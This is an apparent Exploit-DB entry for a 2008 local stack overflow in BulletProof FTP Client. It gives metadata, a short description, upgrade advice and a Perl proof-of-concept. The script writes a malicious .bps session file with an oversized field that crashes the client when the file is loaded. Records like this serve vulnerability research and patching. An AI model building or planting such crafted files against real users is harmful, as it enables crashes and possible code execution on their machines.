BulletProof FTP Client .bps Local Stack Overflow (PoC)

vendor:

BulletProof FTP Client

by:

Mountassif Moad

7.8

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: BulletProof FTP Client

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BulletProof FTP Client .bps Local Stack Overflow (PoC)

This is a proof-of-concept exploit for a local stack overflow vulnerability in BulletProof FTP Client. The vulnerability is triggered when a specially crafted .bps file is loaded, which causes a buffer overflow and allows arbitrary code execution. The exploit was discovered by Mountassif Moad and was published on milw0rm.com in 2008.

Mitigation:

Upgrade to the latest version of BulletProof FTP Client.

Source

Exploit-DB raw data:

#!/usr/bin/perl
########################################
#[*] Bug : BulletProof FTP Client .bps Local Stack Overflow (PoC)
#[*] Founded by : Mountassif Moad
#[*] Greetz : All Freind Str0ke
#[*] HOw to use => go to file after Load BP session & Enter and boom :d overflowing :d
########################################
use warnings;
use strict;
my $chars   = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n" .
                        "\x41" x 100 .
      "\n21\n".
      "Stack\n".
      "bpfhljamedaldlffpojmqhpo\n".
                        "c:\/\n" .
                        "/\n";
my $file="Stack.bps";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Stack";

# milw0rm.com [2008-12-28]